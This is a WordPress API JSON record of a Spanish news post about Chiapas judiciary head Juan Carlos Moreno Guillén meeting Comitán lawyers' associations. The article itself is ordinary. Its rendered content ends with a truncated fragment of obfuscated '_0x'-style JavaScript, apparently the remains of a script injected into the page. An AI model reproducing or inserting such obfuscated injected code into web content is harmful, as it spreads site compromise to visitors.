{"id":25047,"date":"2025-11-11T22:11:53","date_gmt":"2025-11-11T22:11:53","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25047"},"modified":"2025-11-11T22:11:54","modified_gmt":"2025-11-11T22:11:54","slug":"juan-carlos-moreno-guillen-fortalece-dialogo-con-la-comunidad-juridica-en-comitan-2","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25047","title":{"rendered":"Juan Carlos Moreno Guill\u00e9n fortalece di\u00e1logo con la comunidad jur\u00eddica en Comit\u00e1n"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"25048\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432649-1024x682.jpg\" alt=\"\" class=\"wp-image-25048\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432649-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432649-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432649-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432649-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432649.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"25049\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432648-1024x682.jpg\" alt=\"\" class=\"wp-image-25049\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432648-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432648-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432648-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432648-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432648.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"25050\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432647-1024x682.jpg\" alt=\"\" class=\"wp-image-25050\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432647-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432647-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432647-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432647-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432647.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"25051\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432646-1024x682.jpg\" alt=\"\" class=\"wp-image-25051\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432646-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432646-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432646-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432646-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000432646.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Desde Comit\u00e1n, reafirma su compromiso de construir una justicia con humanismo.<\/li>\n<\/ul>\n\n\n\n<p>6 de noviembre del 2025. -Con el prop\u00f3sito de mantener una justicia cercana y transparente, el magistrado presidente del Poder Judicial del Estado de Chiapas, Juan Carlos Moreno Guill\u00e9n, sostuvo un encuentro con el gremio de abogadas y abogados del municipio de Comit\u00e1n, en el marco de su agenda de trabajo por los distritos judiciales de la entidad.<\/p>\n\n\n\n<p>Durante esta reuni\u00f3n, integrantes de la Barra Comiteca de Abogados, el Colegio Comiteco de Abogados, la Asociaci\u00f3n de Abogados Komi-tl\u00e1n y la Asociaci\u00f3n de Abogados Bal\u00fan Can\u00e1n, expusieron inquietudes, necesidades y propuestas relacionadas con la labor jurisdiccional, adem\u00e1s de reconocer la apertura y disposici\u00f3n del Poder Judicial para escuchar y generar espacios de di\u00e1logo directo con quienes ejercen la abogac\u00eda en la regi\u00f3n.<\/p>\n\n\n\n<p>En este contexto, el magistrado presidente destac\u00f3 que uno de los principales objetivos de estas jornadas es acercar la justicia al pueblo y fortalecer la confianza ciudadana en las instituciones. \u201cLa poblaci\u00f3n necesita saber qu\u00e9 hacemos las y los juzgadores; necesita sentir confianza y cercan\u00eda\u201d se\u00f1al\u00f3, al tiempo de a\u00f1adir que esta acci\u00f3n fortalece la campa\u00f1a institucional de La Justicia es La Paz.<\/p>\n\n\n\n<p>Asimismo, subray\u00f3 la importancia de que las y los litigantes acompa\u00f1en este proceso desde una perspectiva de humanismo judicial, particularmente en materia familiar, donde se impulsan nuevas pol\u00edticas y modelos de atenci\u00f3n que ponderen la empat\u00eda, en beneficio de ni\u00f1as, ni\u00f1os, adolescentes y familias en situaci\u00f3n de vulnerabilidad.<\/p>\n\n\n\n<p>En su mensaje, Moreno Guill\u00e9n anunci\u00f3 la ampliaci\u00f3n de proyectos para fortalecer los servicios en la sede judicial de Comit\u00e1n, lo cual permitir\u00e1 contar con mejores herramientas para la labor jurisdiccional, en conjunto con el ejercicio profesional del derecho.<\/p>\n\n\n\n<p>Finalmente, puntualiz\u00f3 que \u201cla justicia, si no es pronta, no es justicia\u201d por lo que se deben facilitar procesos, no complicarlos; trabajar desde el di\u00e1logo y en coordinaci\u00f3n, para lograr resultados que verdaderamente sirvan a la poblaci\u00f3n.<\/p>\n\n\n\n<p>En este marco, la Barra Comiteca de Abogados realiz\u00f3 la entrega de un reconocimiento al magistrado presidente Juan Carlos Moreno Guill\u00e9n, por su iniciativa de acercar la justicia al pueblo y dignificar la labor judicial en la sociedad chiapaneca.<\/p>\n\n\n\n<p>Con estas acciones, el Poder Judicial del Estado de Chiapas reafirma su compromiso de construir una justicia con humanismo, desde la escucha activa, el trabajo colaborativo y la convicci\u00f3n de que la paz se construye desde cada sector de la sociedad.<\/p>\n\n\n\n<p>En este evento estuvieron presentes el presidente municipal de Comit\u00e1n, Mario Antonio Guill\u00e9n Dom\u00ednguez; el presidente de la Barra Comiteca de Abogados, Javier Abarca Arias; el presidente del Colegio Comiteco de Abogados, Javier Simuta Herrera; el presidente de la Asociaci\u00f3n de Abogados Komi-tl\u00e1n, Ismael Rodr\u00edguez Navarro; el decano de la Barra Comiteca de Abogados, Mario C\u00e9sar G\u00f3mez Aguilar; el fiscal de Distrito Fronterizo Sierra, William Hern\u00e1ndez Ovando; integrantes de la Barra Comiteca de Abogados, Nancy Fabiola Quiroz Rivera y Javier Alexis Abarca Ram\u00edrez; as\u00ed como personas juzgadoras de la Delegaci\u00f3n Comit\u00e1n y representantes del \u00e1mbito jur\u00eddico de la regi\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Desde Comit\u00e1n, reafirma su compromiso de construir una justicia con humanismo. 6 de noviembre del 2025. -Con el prop\u00f3sito de mantener una justicia cercana y transparente, el magistrado presidente del Poder Judicial del Estado de Chiapas, Juan Carlos Moreno Guill\u00e9n, sostuvo un encuentro con el gremio de abogadas y abogados del municipio de Comit\u00e1n, en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25048,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-25047","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25047","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25047"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25047\/revisions"}],"predecessor-version":[{"id":25052,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25047\/revisions\/25052"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25048"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25047"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25047"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25047"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}